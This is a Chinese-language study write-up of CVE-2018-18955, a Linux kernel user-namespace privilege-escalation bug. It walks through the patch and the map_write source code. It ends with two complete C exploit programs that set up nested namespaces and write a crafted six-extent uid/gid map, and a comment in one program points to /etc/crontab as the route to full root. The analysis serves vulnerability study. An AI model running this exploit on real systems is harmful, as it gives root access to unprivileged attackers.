简介

这是名称空间的漏洞,文章先介绍user namespaces的简单只是,然后从补丁入手,分析源码,找到漏洞出现的原因。因为对这块的源码不是那么熟悉,所以着重描述源码分析的部分,其他可以参考末尾的链接

本文出现的代码都基于linux-4.15.4

namespace

linux中有实现名称空间,用来隔离不同的资源,实现原理就是将原本是全局的变量放到各个namespaces之中去。

user namespaces

linux中user namespaces的man说明:overview of Linux user namespaces

user namespaces是linux中用来隔离与安全相关的标志符和属性的名称空间,主要包括UID、GID、根目录、秘钥和capacity。在名称空间中,user namespaces可以实现进程和名称空间中有不同的uid和gid,比如名称空间中可以有root权限而在真实系统中没有。

在上面的main说明中可以看到两个proc文件: /proc/<pid>/uid_map 和 /proc/<pid>/gid_map。向这个文件写入值可以用来将系统中的uid或gid映射到namespaces中去。其中:

  • 第一个字段ID-inside-ns表示在容器显示的UID或GID,
  • 第二个字段ID-outside-ns表示容器外映射的真实的UID或GID。
  • 第三个字段表示映射的范围,一般填1,表示一一对应。

比如,把真实的uid=1000映射成容器内的uid=0

$ cat /proc/2465/uid_map
0       1000          1
而向这两个文件中写值的时候有一些限制,在linux4.14之前只能写入5行,在4.15之后,可以达到340行
  • 写这两个文件的进程需要这个namespace中的CAP_SETUID (CAP_SETGID)权限(可参看Capabilities
  • 写入的进程必须是此user namespace的父或子的user namespace进程。
  • 另外需要满如下条件之一:1)父进程将effective uid/gid映射到子进程的user namespace中,2)父进程如果有CAP_SETUID/CAP_SETGID权限,那么它将可以映射到父进程中的任一uid/gid。

补丁分析

这个漏洞的修补在这里,问题出在kernel/user_namespace.c中的map_write之中:

diff --git a/kernel/user_namespace.c b/kernel/user_namespace.c
index e5222b5..923414a 100644
--- a/kernel/user_namespace.c
+++ b/kernel/user_namespace.c
@@ -974,10 +974,6 @@ static ssize_t map_write(struct file *file, const char __user *buf,
     if (!new_idmap_permitted(file, ns, cap_setid, &new_map))
         goto out;

-    ret = sort_idmaps(&new_map);
-    if (ret < 0)
-        goto out;
-
     ret = -EPERM;
     /* Map the lower ids from the parent user namespace to the
      * kernel global id space.
@@ -1004,6 +1000,14 @@ static ssize_t map_write(struct file *file, const char __user *buf,
         e->lower_first = lower_first;
     }

+    /*
+     * If we want to use binary search for lookup, this clones the extent
+     * array and sorts both copies.
+     */
+    ret = sort_idmaps(&new_map);
+    if (ret < 0)
+        goto out;
+
     /* Install the map */
     if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) {
         memcpy(map->extent, new_map.extent,

只是调换了几行代码的位置,先不着急,分析一下这个函数。

在understand中,找出这个函数的调用流程图:

CVE-2018-18955漏洞学习-LMLPHP

然后去看看调用map_write的函数proc_uid_map_write,函数原型:

ssize_t proc_uid_map_write(struct file *file, const char __user *buf,
               size_t size, loff_t *ppos)

参数很像文件描述符的写操作函数,在寻找源码中和该函数相关的操作,发现在fs/proc/base.c之中有这样一个结构用到了proc_uid_map_write:

static const struct file_operations proc_uid_map_operations = {
    .open        = proc_uid_map_open,
    .write        = proc_uid_map_write,
    .read        = seq_read,
    .llseek        = seq_lseek,
    .release    = proc_id_map_release,
};

确认是文件的操作,接着在这个文件中,还有下面的代码

REG("uid_map",    S_IRUGO|S_IWUSR, proc_uid_map_operations)

所以,推测这就是 /proc/<pid>/uid_map文件写操作的实现

源代码分析

接着回到漏洞源代码,开始分析,先从proc_uid_map_write函数开始,也就是文件写操作的第一个函数

ssize_t proc_uid_map_write(struct file *file, const char __user *buf,
               size_t size, loff_t *ppos)
{
    struct seq_file *seq = file->private_data;
    struct user_namespace *ns = seq->private;
    struct user_namespace *seq_ns = seq_user_ns(seq);

    if (!ns->parent)
        return -EPERM;

    if ((seq_ns != ns) && (seq_ns != ns->parent))
        return -EPERM;

    return map_write(file, buf, size, ppos, CAP_SETUID,
             &ns->uid_map, &ns->parent->uid_map);
}

看到只是做了两个检查,然后调用了map_write函数,而map_write函数的后两个参数分别为名称空间的uid_map和父名称空间的uid_map(由名称空间的知识可以知道,名称空间的新建是需要clone处新进程,传入特定参数来创建新的名称空间)

看看这些个map的定义,看到uid_gid_extent的定义正好是符合 /proc/<pid>/uid_map等的文件格式,而且在user_naspace的man手册中写道,这些文件一次能写入多个值,在Linux中4.14之前,这个极限被(任意地)设为5行。从Linux 4.15,限制是340行。这样下面这两个结构就不难理解了,当数据行数在5之内的时候,直接写在extent里面,当大于5的时候,放在forward指向的位置:

#define UID_GID_MAP_MAX_BASE_EXTENTS 5
#define UID_GID_MAP_MAX_EXTENTS 340

struct uid_gid_extent {
    u32 first;
    u32 lower_first;
    u32 count;
};

struct uid_gid_map { /* 64 bytes -- 1 cache line */
    u32 nr_extents;
    union {
        struct uid_gid_extent extent[UID_GID_MAP_MAX_BASE_EXTENTS];
        struct {
            struct uid_gid_extent *forward;
            struct uid_gid_extent *reverse;
        };
    };
};

 看map_write的源码的第一部分,比较好理解了,capacity相关的含义对照man手册中的解释,除去几个参数判断的位置,比较重要的就是kbuf这块内存,调用了memdup_user_nul函数先在内核中分配了一块内存,然后将用户态写入的数据复制到内核之中,最后这块内存由kbuf指向

    struct seq_file *seq = file->private_data;
    struct user_namespace *ns = seq->private;
    struct uid_gid_map new_map;
    unsigned idx;
    struct uid_gid_extent extent;
    char *kbuf = NULL, *pos, *next_line;
    ssize_t ret = -EINVAL;
    memset(&new_map, 0, sizeof(struct uid_gid_map));

    ret = -EPERM;
    /* Only allow one successful write to the map */
    if (map->nr_extents != 0)
        goto out;

    /*
     * Adjusting namespace settings requires capabilities on the target.
     */
    if (cap_valid(cap_setid) && !file_ns_capable(file, ns, CAP_SYS_ADMIN))
        goto out;

    /* Only allow < page size writes at the beginning of the file */
    ret = -EINVAL;
    if ((*ppos != 0) || (count >= PAGE_SIZE))
        goto out;

    /* Slurp in the user data */
    //从用户空间复制写入的数据到kbuf
    kbuf = memdup_user_nul(buf, count);
    if (IS_ERR(kbuf)) {
        ret = PTR_ERR(kbuf);
        kbuf = NULL;
        goto out;
    }

    /* Parse the user data */
    ret = -EINVAL;
    pos = kbuf;

接着看,有一个大循环,不断的按行解析出用户输入数据,存放进extent中,然后调用了两个比较关键的函数,mappings_overlap和insert_extent,mappings_overlap用来检测uid_gid_extent和uid_gid_map有没有重叠的部分,有返回true,insert_extent用来向uid_gid_map中插入一个uid_gid_extent。

    for (; pos; pos = next_line) {

        /* Find the end of line and ensure I don't look past it */
        next_line = strchr(pos, '\n');
        if (next_line) {
            *next_line = '\0';
            next_line++;
            if (*next_line == '\0')
                next_line = NULL;
        }

        pos = skip_spaces(pos);
        extent.first = simple_strtoul(pos, &pos, 10);
        if (!isspace(*pos))
            goto out;

        pos = skip_spaces(pos);
        extent.lower_first = simple_strtoul(pos, &pos, 10);
        if (!isspace(*pos))
            goto out;

        pos = skip_spaces(pos);
        extent.count = simple_strtoul(pos, &pos, 10);
        if (*pos && !isspace(*pos))
            goto out;

        /* Verify there is not trailing junk on the line */
        pos = skip_spaces(pos);
        if (*pos != '\0')
            goto out;

        /* Verify we have been given valid starting values */
        if ((extent.first == (u32) -1) ||
            (extent.lower_first == (u32) -1))
            goto out;

        /* Verify count is not zero and does not cause the
         * extent to wrap
         */
        if ((extent.first + extent.count) <= extent.first)
            goto out;
        if ((extent.lower_first + extent.count) <=
             extent.lower_first)
            goto out;

        /* Do the ranges in extent overlap any previous extents? */
        if (mappings_overlap(&new_map, &extent))
            goto out;

        if ((new_map.nr_extents + 1) == UID_GID_MAP_MAX_EXTENTS &&
            (next_line != NULL))
            goto out;

        ret = insert_extent(&new_map, &extent);
        if (ret < 0)
            goto out;
        ret = -EINVAL;
    }

看看这上面说到的两个关键函数的实现,mappings_overlap函数中,遍历uid_gid_map,取出每个uid_gid_extent,然后和extent进行比较,包括区间的上界和下届,同时可以看到当nr_extent大于5的时候,会指向forword指向的uid_gid_extent

static bool mappings_overlap(struct uid_gid_map *new_map,
                 struct uid_gid_extent *extent)
{
    u32 upper_first, lower_first, upper_last, lower_last;
    unsigned idx;

    upper_first = extent->first;
    lower_first = extent->lower_first;
    upper_last = upper_first + extent->count - 1;
    lower_last = lower_first + extent->count - 1;

    for (idx = 0; idx < new_map->nr_extents; idx++) {
        u32 prev_upper_first, prev_lower_first;
        u32 prev_upper_last, prev_lower_last;
        struct uid_gid_extent *prev;

        if (new_map->nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
            prev = &new_map->extent[idx];
        else
            prev = &new_map->forward[idx];

        prev_upper_first = prev->first;
        prev_lower_first = prev->lower_first;
        prev_upper_last = prev_upper_first + prev->count - 1;
        prev_lower_last = prev_lower_first + prev->count - 1;

        /* Does the upper range intersect a previous extent? */
        if ((prev_upper_first <= upper_last) &&
            (prev_upper_last >= upper_first))
            return true;

        /* Does the lower range intersect a previous extent? */
        if ((prev_lower_first <= lower_last) &&
            (prev_lower_last >= lower_first))
            return true;
    }
    return false;
}

好了,接着看insert_extent函数,可以看出一个大的if条件,当插入操作进行到末尾的时候,会分配一块340的内存,然后将拷贝的目的地址设置为forward指向的位置,接着nr_extent增加

static int insert_extent(struct uid_gid_map *map, struct uid_gid_extent *extent)
{
    struct uid_gid_extent *dest;

    if (map->nr_extents == UID_GID_MAP_MAX_BASE_EXTENTS) {
        struct uid_gid_extent *forward;

        /* Allocate memory for 340 mappings. */
        forward = kmalloc(sizeof(struct uid_gid_extent) *
                 UID_GID_MAP_MAX_EXTENTS, GFP_KERNEL);
        if (!forward)
            return -ENOMEM;

        /* Copy over memory. Only set up memory for the forward pointer.
         * Defer the memory setup for the reverse pointer.
         */
        memcpy(forward, map->extent,
               map->nr_extents * sizeof(map->extent[0]));

        map->forward = forward;
        map->reverse = NULL;
    }

    if (map->nr_extents < UID_GID_MAP_MAX_BASE_EXTENTS)
        dest = &map->extent[map->nr_extents];
    else
        dest = &map->forward[map->nr_extents];

    *dest = *extent;
    map->nr_extents++;
    return 0;
}

下面回到map_write函数,之前的操作都是用来复制输入数据,做一些检查工作,最终的输入数据被放在了new_map中,new_idmap_permitted就不看了,可以对照usernamespaces的capacity来进行理解,接下来的函数是sort_idmaps函数

    if (new_map.nr_extents == 0)
        goto out;

    ret = -EPERM;
    /* Validate the user is allowed to use user id's mapped to. */
    if (!new_idmap_permitted(file, ns, cap_setid, &new_map))
        goto out;

    ret = sort_idmaps(&new_map);
    if (ret < 0)
        goto out;

sort_idmaps函数,这是一个排序函数,并且只有当只排序大于5的部分,同时kmemdup函数还复制了一份,进行了你想排序,将结果放在reverse处,从上面的函数能考到这个值被初始化为NULL

static int sort_idmaps(struct uid_gid_map *map)
{
    if (map->nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
        return 0;

    /* Sort forward array. */
    sort(map->forward, map->nr_extents, sizeof(struct uid_gid_extent),
         cmp_extents_forward, NULL);

    /* Only copy the memory from forward we actually need. */
    map->reverse = kmemdup(map->forward,
                   map->nr_extents * sizeof(struct uid_gid_extent),
                   GFP_KERNEL);
    if (!map->reverse)
        return -ENOMEM;

    /* Sort reverse array. */
    sort(map->reverse, map->nr_extents, sizeof(struct uid_gid_extent),
         cmp_extents_reverse, NULL);

    return 0;
}

然后从map_write函数,遍历了输入数据,调用了map_id_range_down函数,这个函数的参数1是map_write接受的参数表示父名称空间的uid_gid_map,参数23表示写入数据的第23项,也就是映射父名称空间的其实位置和范围

    /* Map the lower ids from the parent user namespace to the
     * kernel global id space.
     */
    for (idx = 0; idx < new_map.nr_extents; idx++) {
        struct uid_gid_extent *e;
        u32 lower_first;

        if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
            e = &new_map.extent[idx];
        else
            e = &new_map.forward[idx];

        lower_first = map_id_range_down(parent_map,
                        e->lower_first,
                        e->count);

        /* Fail if we can not map the specified extent to
         * the kernel global id space.
         */
        if (lower_first == (u32) -1)
            goto out;

        e->lower_first = lower_first;
    }

好,接着看map_id_range_down

static u32 map_id_range_down(struct uid_gid_map *map, u32 id, u32 count)
{
    struct uid_gid_extent *extent;
    unsigned extents = map->nr_extents;
    smp_rmb();

    if (extents <= UID_GID_MAP_MAX_BASE_EXTENTS)
        extent = map_id_range_down_base(extents, map, id, count);
    else
        extent = map_id_range_down_max(extents, map, id, count);

    /* Map the id or note failure */
    if (extent)
        id = (id - extent->first) + extent->lower_first;
    else
        id = (u32) -1;

    return id;
}

直接调用的map_id_range_down_max,是一个二分搜索的封装,回顾用户输入数据,第2个参数表示要映射的父名称空间的起始位置,这个函数使用二分搜索,在父名称空间中找一个uid_gid_extent,而这个uid_gid_extent的[first,first+count-1]包含了子名称空间想映射的区间。

/**
 * map_id_range_down_max - Find idmap via binary search in ordered idmap array.
 * Can only be called if number of mappings exceeds UID_GID_MAP_MAX_BASE_EXTENTS.
 */
static struct uid_gid_extent *
map_id_range_down_max(unsigned extents, struct uid_gid_map *map, u32 id, u32 count)
{
    struct idmap_key key;

    key.map_up = false;
    key.count = count;
    key.id = id;

    return bsearch(&key, map->forward, extents,
               sizeof(struct uid_gid_extent), cmp_map_id);
}

回到map_id_range_down函数,取得这个uid_gid_extent之后,利用这个uid_gid_extent区更新了id并且返回,向前看,可以知道这个id是子名称空间中uid_gid_extent的lower_first字段,也就是想映射的父名称空间的起始位置。下面这句话将id的值更新位父名称空间的父名称空间的位置,由于所有的名称空间都是由一个根名称空间,一步一步嵌套下来,所以这和值最终代表的是整个系统中的uid值。

id = (id - extent->first) + extent->lower_first;

最后,回到map_write函数中,for循环的最后利用下面的语句更新了new_map中对应uid_gid_extent的lower_first字段

e->lower_first = lower_first;

map_write还剩下最后一部分,这部分就类似于写回,map_write传入了一个参数为map,从proc_uid_map_write函数可以知道这是当前名称空间的uid_gid_map,new_map是新建的,这部分的工作就是将new_map写回到map中(这个proc文件只能被写入一次,并且初始的时候是空的)。最后做了一些错误处理。

    /* Install the map */
    if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) {
        memcpy(map->extent, new_map.extent,
               new_map.nr_extents * sizeof(new_map.extent[0]));
    } else {
        map->forward = new_map.forward;
        map->reverse = new_map.reverse;
    }
    smp_wmb();
    map->nr_extents = new_map.nr_extents;

    *ppos = count;
    ret = count;
out:
    if (ret < 0 && new_map.nr_extents > UID_GID_MAP_MAX_BASE_EXTENTS) {
        kfree(new_map.forward);
        kfree(new_map.reverse);
        map->forward = NULL;
        map->reverse = NULL;
        map->nr_extents = 0;
    }

    mutex_unlock(&userns_state_mutex);
    kfree(kbuf);
    return ret;

漏洞分析

前面的sort_idmaps函数中,可以看到当数据数目大于5的时候,还创建了一个reverse的副本,然后进行了排序,然后就没有更改过了,最后将这个内存地址赋值给了map。

来看看两个排序方式的区别

static int cmp_extents_forward(const void *a, const void *b)
{
    const struct uid_gid_extent *e1 = a;
    const struct uid_gid_extent *e2 = b;

    if (e1->first < e2->first)
        return -1;

    if (e1->first > e2->first)
        return 1;

    return 0;
}

/* cmp function to sort() reverse mappings */
static int cmp_extents_reverse(const void *a, const void *b)
{
    const struct uid_gid_extent *e1 = a;
    const struct uid_gid_extent *e2 = b;

    if (e1->lower_first < e2->lower_first)
        return -1;

    if (e1->lower_first > e2->lower_first)
        return 1;

    return 0;
}

forward是用uid_gid_map中uid_gid_extent的first字段来进行排序,而reverse是利用lower_first字段进行排序

在前面调用map_id_range_down的for循环中,更新了e->lower_first的值,而e是通过forward来找到的,所以说最终只是更新了forward中的值,而reverse中的值没有被更改,所以说这个reverse中的值是用户传进来的,如果先有一个名称空间n1,映射自己的root进程到kernel的普通进程,然后n1再创建一个名称空间n2,而将n1的root权限映射到n2的root权限,这样在n2中的uid_map中,forword指向的uid_gid_extent的第2项被更改了,但是forword指向的没有被更改,还保持root到root的映射,所以通过这个reverse来判断的uid就会出现权限提升了。

然后就是这个reverse的链表到底在哪里被用到,并且是用来干嘛的?

根据作者的介绍,在user_namespaces中对reverse这个变量的引用,可以知道直接利用的函数在from_kuid()中,被kuid_has_mapping()判断是否被映射,后者接着又被类似于 inode_owner_or_capable() 和 privileged_wrt_inode_uidgid()这样的权限检查函数所使用。
关于kuid_has_mapping()的使用方法其实可以参考unshare的实现,代码从unshare的系统调用服务例程开始,调用流程如下
1、kernel/fork.c/SYSCALL_DEFINE1(unshare, unsigned long, unshare_flags)
2、kernel/user_namespaces.c/unshare_userns
3、kernel/user_namespaces.c/create_user_ns
4、kernel/user_namespaces.c/kuid_has_mapping

利用代码

最后附上漏洞利用的代码,第一部分是subuid_shell.c,这是一个普通的unshare函数来创建一个新的名空间,主要流程如下:

1、父进程fork子进程,之后子进程等待,父进程调用unshare创建一个新的名称空间

2、父进程创建新的名称空间后等待,子进程写入uid_map等文件,设立映射条件

3、子进程等待,父进程调用sh

#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    int sync_pipe[2];
    char dummy;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
        err(1, "pipe");

    pid_t child = fork();
    if (child == -1)
        err(1, "fork");
    if (child == 0) {
        // kill child if parent dies
        prctl(PR_SET_PDEATHSIG, SIGKILL);
        close(sync_pipe[1]);

        // create new ns
        if (unshare(CLONE_NEWUSER))
            err(1, "unshare userns");

        if (write(sync_pipe[0], "X", 1) != 1)
            err(1, "write to sock");
        if (read(sync_pipe[0], &dummy, 1) != 1)
            err(1, "read from sock");

        // set uid and gid to 0, in child ns
        if (setgid(0))
            err(1, "setgid");
        if (setuid(0))
            err(1, "setuid");

        // replace process with bash shell, in which you will see "root",
        // as the setuid(0) call worked
        // this might seem a little confusing, but you are "root" only to this child ns,
        // thus, no permission to the outside ns
        execl("/bin/bash", "bash", NULL);
        err(1, "exec");
    }

    close(sync_pipe[0]);
    if (read(sync_pipe[1], &dummy, 1) != 1)
        err(1, "read from sock");

    // set id mapping (0..1000) for child process
    char cmd[1000];
    sprintf(cmd, "echo deny > /proc/%d/setgroups", (int)child);
    if (system(cmd))
        errx(1, "denying setgroups failed");
    sprintf(cmd, "newuidmap %d 0 100000 1000", (int)child);
    if (system(cmd))
        errx(1, "newuidmap failed");
    sprintf(cmd, "newgidmap %d 0 100000 1000", (int)child);
    if (system(cmd))
        errx(1, "newgidmap failed");

    if (write(sync_pipe[1], "X", 1) != 1)
        err(1, "write to sock");

    int status;
    if (wait(&status) != child)
        err(1, "wait");
    return 0;
}

然后是subshell.c函数,主要流程同上,只是子进程写入映射的数据不同,为什么是这些数据可以参考前面的漏洞分析部分

#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <grp.h>
#include <sched.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    int sync_pipe[2];
    char dummy;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe))
        err(1, "pipe");

    // create a child process
    pid_t child = fork();
    if (child == -1)
        err(1, "fork");
    if (child == 0) {
        // in child process
        close(sync_pipe[1]);

        // this creates a new ns
        if (unshare(CLONE_NEWUSER))
            err(1, "unshare userns");
        if (write(sync_pipe[0], "X", 1) != 1)
            err(1, "write to sock");

        if (read(sync_pipe[0], &dummy, 1) != 1)
            err(1, "read from sock");

        // start a bash process (replace process image)
        // this time you are actually root, without the name/id, though
        // technically the root access is not complete,
        // to get complete root, write to /etc/crontab and wait for a root shell to pop up
        execl("/bin/bash", "bash", NULL);
        err(1, "exec");
    }

    close(sync_pipe[0]);
    if (read(sync_pipe[1], &dummy, 1) != 1)
        err(1, "read from sock");

    char pbuf[100]; // path of uid_map
    sprintf(pbuf, "/proc/%d", (int)child);

    // cd to /proc/pid/uid_map
    if (chdir(pbuf))
        err(1, "chdir");

    // our new id mapping with 6 extents (> 5 extents)
    const char* id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";

    // write the new mapping to uid_map and gid_map
    int uid_map = open("uid_map", O_WRONLY);
    if (uid_map == -1)
        err(1, "open uid map");
    if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping))
        err(1, "write uid map");
    close(uid_map);
    int gid_map = open("gid_map", O_WRONLY);
    if (gid_map == -1)
        err(1, "open gid map");
    if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping))
        err(1, "write gid map");
    close(gid_map);
    if (write(sync_pipe[1], "X", 1) != 1)
        err(1, "write to sock");

    int status;
    if (wait(&status) != child)
        err(1, "wait");
    return 0;
}
05-09 00:37